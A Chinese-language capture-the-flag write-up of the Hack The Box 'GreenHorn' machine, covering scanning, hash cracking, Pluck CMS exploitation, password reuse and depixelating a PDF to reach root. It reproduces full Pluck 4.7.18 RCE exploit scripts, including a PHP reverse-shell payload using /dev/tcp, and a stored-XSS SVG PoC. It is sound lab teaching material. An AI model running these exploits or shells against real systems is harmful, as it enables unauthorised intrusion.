HTB:GreenHorn[WriteUP]

目录

连接至HTB服务器并启动靶机

使用nmap对靶机TCP端口进行开放扫描

再次使用nmap对这三个端口进行脚本、服务扫描

尝试先通过curl访问靶机80端口

将靶机IP与该域名写入hosts使DNS本地解析

使用浏览器访问greenhorn.htb

使用Wappalyzer插件查看该页面技术栈

尝试在searchsploit搜索该CMS漏洞

这里使用curl访问login_url、upload_url都是响应404

使用ffuf尝试寻找该域名的子域

使用浏览器直接访问/admin.php

再次通过searchsploit搜索该CMS漏洞

回到一开头的RCE漏洞

尝试使用浏览器访问靶机3000端口页面

判断该哈希值类型

回到登录界面,这次成功登录了

横向移动

USER_FLAG:fb721ba08d0f33ea2db2435988373890

权限提升

靶机通过python3开启一个http服务

尝试复原马赛克原文

ROOT_FLAG:c279c1f9e7a93817a0d31cfa95205a62


连接至HTB服务器并启动靶机

靶机IP:10.10.11.25

分配IP:10.10.14.12


使用nmap对靶机TCP端口进行开放扫描

nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.11.25

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nmap -p- --min-rate=1500 -T5 -sS -Pn 10.10.11.25
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-08 06:59 EST
Warning: 10.10.11.25 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.11.25 (10.10.11.25)
Host is up (0.066s latency).
Not shown: 65433 closed tcp ports (reset), 99 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
3000/tcp open  ppp

Nmap done: 1 IP address (1 host up) scanned in 46.13 seconds

可见开放端口:22、80、3000

再次使用nmap对这三个端口进行脚本、服务扫描

nmap -p 22,80,3000 -sCV 10.10.11.25

尝试先通过curl访问靶机80端口

curl -I http://10.10.11.25

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://10.10.11.25  
HTTP/1.1 302 Moved Temporarily
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 08 Nov 2024 11:51:57 GMT
Content-Type: text/html
Content-Length: 154
Connection: keep-alive
Location: http://greenhorn.htb/

发现被重定位到:greenhorn.htb

将靶机IP与该域名写入hosts使DNS本地解析

echo '10.10.11.25 greenhorn.htb' >> /etc/hosts

使用浏览器访问greenhorn.htb

点击下方的admin会跳转到/login.php

通过该页面信息可以判断,该CMS版本为:4.7.18

使用Wappalyzer插件查看该页面技术栈


尝试在searchsploit搜索该CMS漏洞

searchsploit pluck

在searchsploit可以看到4.7.18是存在一个RCE漏洞的,直接把相关EXP拷贝到当前目录下

searchsploit -m 51592.py

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# searchsploit -m 51592.py
  Exploit: Pluck v4.7.18 - Remote Code Execution (RCE)
      URL: https://www.exploit-db.com/exploits/51592
     Path: /usr/share/exploitdb/exploits/php/webapps/51592.py
    Codes: N/A
 Verified: False
File Type: Python script, Unicode text, UTF-8 text executable
Copied to: /home/kali/Desktop/temp/51592.py

查看该EXP代码

cat 51592.py
#Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE)
#Application: pluck
#Version: 4.7.18
#Bugs:  RCE
#Technology: PHP
#Vendor URL: https://github.com/pluck-cms/pluck
#Software Link: https://github.com/pluck-cms/pluck
#Date of found: 10-07-2023
#Author: Mirabbas Ağalarov
#Tested on: Linuximport requests
from requests_toolbelt.multipart.encoder import MultipartEncoderlogin_url = "http://localhost/pluck/login.php"
upload_url = "http://localhost/pluck/admin.php?action=installmodule"
headers = {"Referer": login_url,}
login_payload = {"cont1": "admin","bogus": "","submit": "Log in"}file_path = input("ZIP file path: ")multipart_data = MultipartEncoder(fields={"sendfile": ("mirabbas.zip", open(file_path, "rb"), "application/zip"),"submit": "Upload"}
)session = requests.Session()
login_response = session.post(login_url, headers=headers, data=login_payload)if login_response.status_code == 200:print("Login account")upload_headers = {"Referer": upload_url,"Content-Type": multipart_data.content_type}upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)if upload_response.status_code == 200:print("ZIP file download.")else:print("ZIP file download error. Response code:", upload_response.status_code)
else:print("Login problem. response code:", login_response.status_code)rce_url="http://localhost/pluck/data/modules/mirabbas/miri.php"rce=requests.get(rce_url)print(rce.text)

这里使用curl访问login_url、upload_url都是响应404

curl -I http://greenhorn.htb/pluck/login.php
curl -I http://greenhorn.htb/pluck/admin.php?action=installmodule

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://greenhorn.htb/pluck/login.php
HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 08 Nov 2024 12:01:40 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive

                                                                                                                                                     
┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# curl -I http://greenhorn.htb/pluck/admin.php?action=installmodule
HTTP/1.1 404 Not Found
Server: nginx/1.18.0 (Ubuntu)
Date: Fri, 08 Nov 2024 12:01:57 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive

这并不意味着这个EXP是不可用的,因为靶机的admin.php和login.php均不在pluck路径下


使用ffuf尝试寻找该域名的子域

ffuf -u http://greenhorn.htb/ -H 'Host: FUZZ.greenhorn.htb' -w ../dictionary/subdomains-top5000.txt -fc 302

眼见扫不出子域,只能尝试路径FUZZ了

ffuf -u http://greenhorn.htb/FUZZ -w ../dictionary/common.txt -fc 302

这里扫出了一个admin.php,而一开头点击admin会跳转至login.php

而searchsploit搜索该CMS相关漏洞时,除了一个RCE,还有一个存储型XSS...

使用浏览器直接访问/admin.php

可以看到是成功访问了的,但因为session或者cookie的原因没有通过访问

考虑是通过存储型XSS获取管理员Cookie然后登录后台面板?


再次通过searchsploit搜索该CMS漏洞

searchsploit pluck

取出该存储型XSS相关PoC

searchsploit -m 51420.txt

查看该PoC内容

cat 51420.txt
Exploit Title: pluck v4.7.18 - Stored Cross-Site Scripting (XSS)
Application: pluck
Version: 4.7.18
Bugs:  XSS
Technology: PHP
Vendor URL: https://github.com/pluck-cms/pluck
Software Link: https://github.com/pluck-cms/pluck
Date of found: 01-05-2023
Author: Mirabbas Ağalarov
Tested on: Linux2. Technical Details & POC
========================================
steps:1. create .svg file.
2. svg file content:
<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><script type="text/javascript">alert(document.location);</script>
</svg>3. upload file (http://localhost/pluck-4.7.18/admin.php?action=files)poc requestPOST /pluck-4.7.18/admin.php?action=files HTTP/1.1
Host: localhost
Content-Length: 672
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Linux"
Upgrade-Insecure-Requests: 1
Origin: http://localhost
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryJMTiFxESCx7aNqmI
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://localhost/pluck-4.7.18/admin.php?action=files
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=s34g5lr0qg5m4qh0ph5plmo8de
Connection: close------WebKitFormBoundaryJMTiFxESCx7aNqmI
Content-Disposition: form-data; name="filefile"; filename="SVG_XSS.svg"
Content-Type: image/svg+xml<?xml version="1.0" standalone="no"?>
<!DOCTYPE svg PUBLIC "-//W3C//DTD SVG 1.1//EN" "http://www.w3.org/Graphics/SVG/1.1/DTD/svg11.dtd"><svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg"><polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/><script type="text/javascript">alert(document.location);</script>
</svg>
------WebKitFormBoundaryJMTiFxESCx7aNqmI
Content-Disposition: form-data; name="submit"Upload
------WebKitFormBoundaryJMTiFxESCx7aNqmI--4. go to http://localhost/pluck-4.7.18/files/svg_xss.svg 

发现这玩意是需要进入admin.php下才能进行POST操作的...


回到一开头的RCE漏洞

我重新到Github找到了其他的EXP

#!/bin/bash# Exploit Title: Pluck v4.7.18 - Remote Code Execution (RCE)
# Application: pluck
# Version: 4.7.18
# Bugs: RCE
# Technology: PHP
# Vendor URL: https://github.com/pluck-cms/pluck
# Date of found: 10-07-2023
# Author: Mirabbas Ağalarov
# Tested on: Linux# Start the timer
start_time=$(date +%s)# Default variables for host, IP, Port, and Password
host=""
ip=""
port=""
password=""
cookie=""# Function to display usage help
usage() {echo "Usage: $0 -h <Host> -p <Password> -i <IP> -P <Port>"echo "   -h  Set the host URL (e.g., xyz.htb)"echo "   -P  Set the password for the platform"echo "   -i  Set the IP address for the reverse shell"echo "   -p  Set the Port number for the reverse shell"exit 1
}# Parse command-line arguments
while getopts "h:p:i:P:" opt; docase "$opt" inh) host="$OPTARG" ;;P) password="$OPTARG" ;;i) ip="$OPTARG" ;;p) port="$OPTARG" ;;*) usage ;;esac
done# Check if required arguments are provided
if [ -z "$host" ] || [ -z "$ip" ] || [ -z "$port" ] || [ -z "$password" ]; thenecho "Error: Host, IP, Port, and Password are required."usage
fi# Loop until Netcat is running on the specified port
while true; donc_check=$(netstat -an | grep ":$port" | grep "LISTEN")if [ -z "$nc_check" ]; thenecho "Start a listener using 'nc -nvlp $port' before uploading the exploit."sleep 5  # Wait for 5 seconds before checking againelseecho "Netcat listener detected on port $port."breakfi
done# Set URLs for login, upload, and RCE paths
login_url="http://$host/login.php"
upload_url="http://$host/admin.php?action=installmodule"
rce_url="http://$host/data/modules/loverce/love.php"# Function to extract and store the session cookie
extract_cookie() {cookie=$(echo "$1" | grep -oP '(?<=Set-Cookie: )PHPSESSID=[^;]+')echo "Extracted Cookie: $cookie"
}# Download the reverse shell PHP exploit
echo "Downloading reverse shell PHP exploit..."
exploit_url="https://www.revshells.com/PHP%20PentestMonkey?ip=$ip&port=$port&shell=bash&encoding=bash"
curl -sL "$exploit_url" -o reverse_shell.php# Check if the download was successful
if [ ! -f reverse_shell.php ]; thenecho "Error downloading reverse shell exploit."exit 1
fi# Rename reverse_shell.php to love.php (to match the RCE path)
mv reverse_shell.php love.php# Zip the reverse shell and clean up the PHP file
zip_filename="loverce.zip"
zip -r "$zip_filename" love.php
rm love.php
echo "Exploit zipped as $zip_filename and original PHP file removed."# Set login payload with only password
login_payload="cont1=$password&bogus=&submit=Log+in"# Attempt login, follow redirects with -L, and extract the cookie
login_response=$(curl -s -i -L -X POST -d "$login_payload" "$login_url" -H "Content-Type: application/x-www-form-urlencoded" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.6668.71 Safari/537.36" -H "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7" -H "Referer: http://$host/login.php" -H "Origin: http://$host" -H "Connection: keep-alive")# Extract session cookie
extract_cookie "$login_response"# Check if login was successful
if echo "$login_response" | grep -q "Password correct. Logging you in..."; thenecho "Login successful!"# Upload the ZIP file using the extracted cookieupload_response=$(curl -s -i -X POST -F "sendfile=@$zip_filename;type=application/zip" -F "submit=Upload" "$upload_url" -H "Cookie: $cookie")# Check if upload was successfulif echo "$upload_response" | grep -q "HTTP/1.1 200 OK"; thenecho "ZIP file uploaded successfully."# Inform the user that RCE is triggeredecho "RCE is waiting for you, please go take a look."# Add a short delay before triggering the RCEsleep 5# Execute the RCE request using the extracted cookie (suppress 504 error)rce_response=$(curl -s -H "Cookie: $cookie" "$rce_url" || true)# Clean output (don't show 504 Gateway Time-out)if [[ ! "$rce_response" =~ "504 Gateway Time-out" ]]; thenecho "$rce_response"fi# Calculate the time taken to complete the scriptend_time=$(date +%s)duration=$((end_time - start_time))echo "Script terminated. Total time taken: $duration seconds."exit 0elseecho "Error uploading ZIP file. Check response."exit 1fi
elseecho "Login failed."# Print login response for debuggingecho "$login_response"exit 1
fi

这个EXP看起来就好多了,应该是针对HTB这个靶机写的(这算作弊么)

对该EXP进行代码审计可知,这需要我们拿到该CMS的管理员密码才可进行利用

当我用弱口令TOP20000跑了半天,我就知道这里必然不是弱口令T_T

打开浏览器一看,天都塌了,居然被封了五分钟


(此时我突然想起了一开头我们nmap扫描时一共扫出了三个端口)

尝试使用浏览器访问靶机3000端口页面

右上角居然还有一个注册按钮,那我们就来注册一个test账户,密码八个八

账户:test

密码:88888888

回到登录界面,发现不对啊,只能用admin用户登录T_T

回到靶机3000端口页面,在探索栏目下可以看到网页源码

点击login.php,看看会不会有敏感信息的泄露

发现源码中出现了一个pass.php?尝试去看看它的内容

这哈希密码就直接写在这文件里了,服了

d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163

判断该哈希值类型

SHA512在hashcat中的参数为:1700

尝试通过弱口令字典爆破,将哈希值写入文件中

echo 'd5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163' > hash

对该哈希值进行爆破

hashcat -m 1700 hash -a 0 ../dictionary/rockyou.txt --quiet 

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# hashcat -m 1700 hash -a 0 ../dictionary/rockyou.txt --quiet     
d5443aef1b64544f3685bf112f6c405218c573c7279a831b1fe9612e3a4d770486743c5580556c0d838b51749de15530f87fb793afdcc689b6b39024d7790163:iloveyou1

账户:admin        

密码:iloveyou1


回到登录界面,这次成功登录了

但似乎两个EXP都没有用上,而且配置好正确密码后没一个能利用成功的

这次找到了一个直接可用的EXP

#!/usr/bin/python3
import os
import zipfile
import requests
from requests_toolbelt.multipart.encoder import MultipartEncoder
import argparsedef create_payload(ip_attack, port_attack):print('[+] Creating payload')return f"<?php echo system(\"bash -c 'exec bash -i &>/dev/tcp/{ip_attack}/{port_attack} <&1'\")?>"def create_file(ip, port, file_name_php):payload_content = create_payload(ip, port)print(f"[+] {'Creating' if not os.path.exists(file_name_php) else 'Overwriting'} .php file")with open(file_name_php, 'w') as payload_file:payload_file.write(payload_content)return file_name_phpdef create_zip(file):zip_file_name = 'malicious_file.zip'print('[+] Creating ZIP file')with zipfile.ZipFile(zip_file_name, 'w') as zipf:zipf.write(file)return zip_file_namedef upload_zip_malicious(file_name_zip, host, password,file_name_php):login_url = f"{host}/login.php"upload_url = f"{host}/admin.php?action=installmodule"headers = {"Referer": login_url}login_payload = {"cont1": password, "bogus": "", "submit": "Log in"}with requests.Session() as session:login_response = session.post(login_url, headers=headers, data=login_payload)if login_response.status_code == 200:print("Login successful")with open(file_name_zip, "rb") as f:multipart_data = MultipartEncoder(fields={"sendfile": ("mirabbas.zip", f, "application/zip"),"submit": "Upload"})upload_headers = {"Referer": upload_url,"Content-Type": multipart_data.content_type}upload_response = session.post(upload_url, headers=upload_headers, data=multipart_data)if upload_response.status_code == 200:print("[+] ZIP file uploaded successfully")else:print("[+] Error uploading ZIP file. Response code:", upload_response.status_code)else:print("[+] Login failed. Response code:", login_response.status_code)rce_url = f"{host}/data/modules/mirabbas/{file_name_php}"rce_response = session.get(rce_url)#print(rce_response.text)def main():parser = argparse.ArgumentParser(description='Script to create and upload a malicious ZIP file.')parser.add_argument('--password', required=True, help='Password login')parser.add_argument('--filename', default='malicious.php', help='Name of the PHP file to be created')parser.add_argument('--ip', required=True, help='Attack IP ')parser.add_argument('--port', required=True, help='Attack Port')parser.add_argument('--host', required=True, help='Target host URL')args = parser.parse_args()file = create_file(args.ip, args.port, args.filename)zip_file = create_zip(file)upload_zip_malicious(zip_file, args.host, args.password,args.filename)if __name__ == '__main__':main()

直接通过该EXP进行漏洞利用

python exploit_pluckv4.7.18_RCE.py --password iloveyou1 --ip 10.10.14.12 --port 1425 --host http://greenhorn.htb

本地侧nc收到回显

┌──(root㉿kali)-[/home/kali/Desktop/temp]
└─# nc -lvnp 1425
listening on [any] 1425 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.11.25] 39346
bash: cannot set terminal process group (1040): Inappropriate ioctl for device
bash: no job control in this shell
www-data@greenhorn:~/html/pluck/data/modules/mirabbas$ whoami
whoami
www-data


横向移动

查看该系统内用户

cat /etc/passwd

可以看到能登录的也就三个:git、junior、root

尝试通过密码:iloveyou1切换到这些用户

www-data@greenhorn:/home$ su root
su root
Password: iloveyou1
su: Authentication failure
www-data@greenhorn:/home$ su git
su git
Password: iloveyou1
su: Authentication failure
www-data@greenhorn:/home$ su junior
su junior
Password: iloveyou1
whoami
junior

成功切换到了junior用户

账户:junior

密码:iloveyou1

提升TTY

script -c /bin/bash -q /dev/null

查找user_flag并查看其内容

junior@greenhorn:/home$ find / -name 'user.txt' 2>/dev/null
find / -name 'user.txt' 2>/dev/null
/home/junior/user.txt
junior@greenhorn:/home$ cat /home/junior/user.txt
cat /home/junior/user.txt
fb721ba08d0f33ea2db2435988373890

USER_FLAG:fb721ba08d0f33ea2db2435988373890


权限提升

查看该用户可特权执行的命令

sudo -l

junior@greenhorn:/home$ sudo -l
sudo -l
[sudo] password for junior: iloveyou1

Sorry, user junior may not run sudo on greenhorn.

查看该用户所属组别

groups

junior@greenhorn:/home$ groups
groups
junior

看来只能再看看有没有配置文件或者其他敏感文件泄露密码了

junior@greenhorn:~$ pwd
pwd
/home/junior

junior@greenhorn:~$ ls
ls
 user.txt  'Using OpenVAS.pdf'

这里有个莫名其妙的pdf文件,里面很可能有HTB留下的密码(毕竟是EASY难度的靶机)

靶机通过python3开启一个http服务

python3 -m http.server 6666

攻击机通过该http服务将Using OpenVAS.pdf文件进行下载

wget http://10.10.11.25:6666/'Using OpenVAS.pdf' -O 'Using OpenVAS.pdf'

把这PDF文件拖到桌面打开后还真有密码,只不过是被打码的而且还是图片

国产化后:

你好,朱尼尔,
我们最近在服务器上安装了 OpenVAS(开放式漏洞评估系统),以便积极监测和识别潜在的安全漏洞。目前,只有以我为代表的根用户有权使用以下命令执行 OpenVAS:
“sudo /usr/sbin/openvas”
输入密码:
作为你熟悉这个工具的一部分,我们鼓励你学习如何有效地使用 OpenVAS。将来,当出现提示时,你也可以通过输入相同的命令并提供你的密码来运行 OpenVAS。
如果你有任何问题或需要进一步的帮助,请随时联系我们。
祝你度过愉快的一周,
格林先生

根据该文件中的内容可知,我们运行sudo /usr/sbin/openvas命令不需要ROOT密码

sudo /usr/sbin/openvas

junior@greenhorn:~$ sudo /usr/sbin/openvas
sudo /usr/sbin/openvas
[sudo] password for junior: iloveyou1

junior is not in the sudoers file.  This incident will be reported.

Emmmmmmm,看来并不是通过该文件进行权限提升的

尝试复原马赛克原文

将马赛克图片从PDF文件中提取出来

pdfimages 'Using OpenVAS.pdf' ./test

使用depix脚本进行复原

python .\depix.py -p .\test-000.ppm -s images/searchimages/debruinseq_notepad_Windows10_closeAndSpaced.png -o out.png

依稀能分辨:sidefromsidetheothersidesidefromsidetheotherside

使用该密码对靶机ROOT用户进行SSH服务登录

查找root_flag位置并查看其内容

root@greenhorn:~# find / -name 'root.txt'
/root/root.txt
root@greenhorn:~# cat /root/root.txt
c279c1f9e7a93817a0d31cfa95205a62

ROOT_FLAG:c279c1f9e7a93817a0d31cfa95205a62

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/bicheng/59943.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

HarmonyOS-消息推送

一. 服务简述 Push Kit&#xff08;推送服务&#xff09;是华为提供的消息推送平台&#xff0c;建立了从云端到终端的消息推送通道。所有HarmonyOS 应用可通过集成 Push Kit&#xff0c;实现向应用实时推送消息&#xff0c;使消息易见&#xff0c;构筑良好的用户关系&#xff0…

精选 Top10 开源调度工具,解锁高效工作负裁自动化

在大数据和现代 IT 环境中&#xff0c;任务调度与工作负载自动化&#xff08;WLA&#xff09;工具是优化资源利用、提升生产效率的核心驱动力。随着企业对数据分析、实时处理和多地域任务调度需求的增加&#xff0c;这些工具成为关键技术。 本文将介绍当前技术发展背景下的Top …

【论文阅读】Learning dynamic alignment via meta-filter for few-shot learning

通过元滤波器学习动态对齐以实现小样本学习 引用&#xff1a;Xu C, Fu Y, Liu C, et al. Learning dynamic alignment via meta-filter for few-shot learning[C]//Proceedings of the IEEE/CVF conference on computer vision and pattern recognition. 2021: 5182-5191. 论文…

软件崩溃?提示“由于找不到d3dx9_43.dll”是什么情况?如何有效解决d3dx9_43.dll丢失的方法分享

d3dx9_43.dll错误是电脑经常出现的情况&#xff1f;那么出现“由于找不到d3dx9_43.dll”错误的问题是什么原因导致的呢&#xff1f;同时又有什么办法可以将错误提示“由于找不到d3dx9_43.dll”的问题进行解决呢&#xff1f; d3dx9_43.dll文件缺失是什么情况&#xff1f; d3dx9…

Latex中给公式加边框

1、这里使用的不是 amsmath 的 \boxed 命令, 而是 empheq 的 empheq 环境以及 xcolor 的 \fcolorbox 命令, 下面是代码, 可以分别阅读这两个手册来获取更多的信息 \documentclass{article} \usepackage{xcolor} \usepackage{empheq} \usepackage{amsmath} \begin{document}\be…

设计模式之原型模式(上机考试多套试,每人题目和答案乱序排列场景)

前言&#xff1a; 平常你也付出了很多的时间&#xff0c;但就是没有得到多少收益。就像有时候很多小伙伴问我&#xff0c;我是该怎么学一个我没接触过的内容。我的个人经验非常建议&#xff0c;先不要学太多理论性的内容&#xff0c;而是尝试实际操作下&#xff0c;把要学的内容…

如何提高谷歌收录速度?

相信很多做外贸推广的朋友都遇到过这种情况&#xff1a;网站上线了&#xff0c;但新页面迟迟不被谷歌收录。即使你的内容很优秀&#xff0c;设计也很精美&#xff0c;如果谷歌爬虫抓不到页面&#xff0c;一切努力就白费了。这时候&#xff0c;GSI谷歌快速收录服务就成了“救命稻…

C++builder中的人工智能(15):C++高斯误差线性单元(GELU)

在这篇文章中&#xff0c;我们将探索高斯误差线性单元&#xff08;GELU&#xff1a;Gaussian Error Linear Unit&#xff09;是什么&#xff0c;它是如何在人工神经网络&#xff08;ANN&#xff09;中工作的&#xff0c;以及GELU可以应用于哪些AI技术。通过学习C中的高斯误差线…

Python | Leetcode Python题解之第552题学生出勤记录II

题目&#xff1a; 题解&#xff1a; class Solution:def checkRecord(self, n: int) -> int:MOD 10**9 7mat [[1, 1, 0, 1, 0, 0],[1, 0, 1, 1, 0, 0],[1, 0, 0, 1, 0, 0],[0, 0, 0, 1, 1, 0],[0, 0, 0, 1, 0, 1],[0, 0, 0, 1, 0, 0],]def multiply(a: List[List[int]],…

网页版五子棋——匹配模块(客户端开发)

前一篇文章&#xff1a;网页版五子棋——用户模块&#xff08;客户端开发&#xff09;-CSDN博客 目录 前言 一、前后端交互接口设计 二、游戏大厅页面 1.页面代码编写 2.前后端交互代码编写 3.测试获取用户信息功能 结尾 前言 前面文章介绍完了五子棋项目用户模块的代码…

【微服务】不同微服务之间用户信息的获取和传递方案

如何才能在每个微服务中都拿到用户信息&#xff1f;如何在微服务之间传递用户信息&#xff1f; 文章目录 概述利用微服务网关做登录校验网关转微服务获取用户信息openFeign传递微服务之间的用户信息 概述 要在每个微服务中获取用户信息&#xff0c;可以采用以下几种方法&#…

OpenEuler 下 Docker 安装、配置与测试实例

文章目录 前言1. 环境准备2. 下载 Docker3.配置服务文件4.配置加速器加速下载docker镜像5. 验证 Docker 安装 前言 Docker 安装大致分为包管理器安装、脚本安装、离线手动安装、容器编排工具安装、桌面版安装等&#xff0c;每种安装各有特点&#xff0c;但涉及知识面不少&…

GK7205V500 GK7250V510 国科微 SOC芯片

GK7205V500 芯片是国科推出的新一代高集成度、高画质、低码率、低功耗的 AI IP Camera SoC 芯 片。 芯片集成 ARM Cortex A7 处理器&#xff0c;支持专业的 ISP 图像处理单元&#xff0c;H.265/H.264 视频编码与神经网络 处理单元&#xff08;NPU&#xff09;&#xff0c…

_浅谈单片机的gcc优化级别__以双音频信号发生器为例

一、简介 gcc有多种优化级别&#xff0c;一般不选择的情况下&#xff0c;IDE默认是按照-Og或这-O2优化的。 以gcc编译器为例&#xff0c;浅谈一下优化级别&#xff0c;我们常见的优化一般是指gcc的-O2、-Og。除此之外&#xff0c;gcc还有-Os等一系列优化&#xff0c;链接器也有…

qt QTreeWidgetItem详解

1、概述 QTreeWidgetItem 是 Qt 框架中的一个类&#xff0c;专门用于在 QTreeWidget&#xff08;一个基于项的树形视图&#xff09;中表示单个节点&#xff08;或称为项&#xff09;。QTreeWidget 继承自 QAbstractItemView&#xff0c;而 QTreeWidgetItem 则作为树中的一个节…

[每周一更]-(第122期):模拟面试|数据库面试思路解析

10|数据库索引:为什么 MySQL 用 B+ 树而不用 B 树? 为什么 MySQL 用 B+ 树而不用 B 树? 什么是覆盖索引? 什么是聚簇索引/非聚簇索引? 什么是哈希索引?MySQL InnoDB 引擎怎么创建一个哈希索引? 什么回表?如何避免回表? 树的高度和查询性能是什么关系? 什么是索引最左…

java-智能识别车牌号_基于spring ai和开源国产大模型_qwen vl

用大模型做车牌号识别&#xff0c;最简单高效 在Java场景中&#xff0c;java识别车牌号的需求非常普遍。过去&#xff0c;我们主要依赖OCR等传统方法来实现java识别车牌号&#xff0c;但这些方法的效果往往不稳定。随着技术的发展&#xff0c;现在有了更先进的解决方案——大模…

FreeRTOS学习日志--中断测试实验,以及遇到的问题

目录 实验项目&#xff1a;FreeRTOS 中断测试实验 1、实验目的 2、实验设计 遇到的问题 stm32F103战舰在运行程序后&#xff0c;USB232串口不能接收到信号问题。 从跑马灯FreeRTOS文件基础上移植的FreeRTOS中断无效&#xff0c;而例程中断有效问题。 问题来源与解决方法…

shodan[3](泷羽sec)

声明 学习视频来自B站UP主 泷羽sec,如涉及侵泷羽sec权马上删除文章。 笔记只是方便各位师傅学习知识,以下网站只涉及学习内容,其他的都与本人无关,切莫逾越法律红线,否则后果自负 这节课旨在扩大自己在网络安全方面的知识面&#xff0c;了解网络安全领域的见闻&#xff0c;了…

Element UI组件Dialog显示闪动问题【解决方案】

在ElementUI中&#xff0c;el-dialog弹窗确实有时会导致页面出现抖动或闪动的问题。这通常是由于弹窗出现时对页面布局的影响&#xff0c;特别是滚动条的出现或消失&#xff0c;导致了页面的重新布局和渲染。以下是一些解决或缓解这一问题的方法&#xff1a; 解决方案 1. 关闭…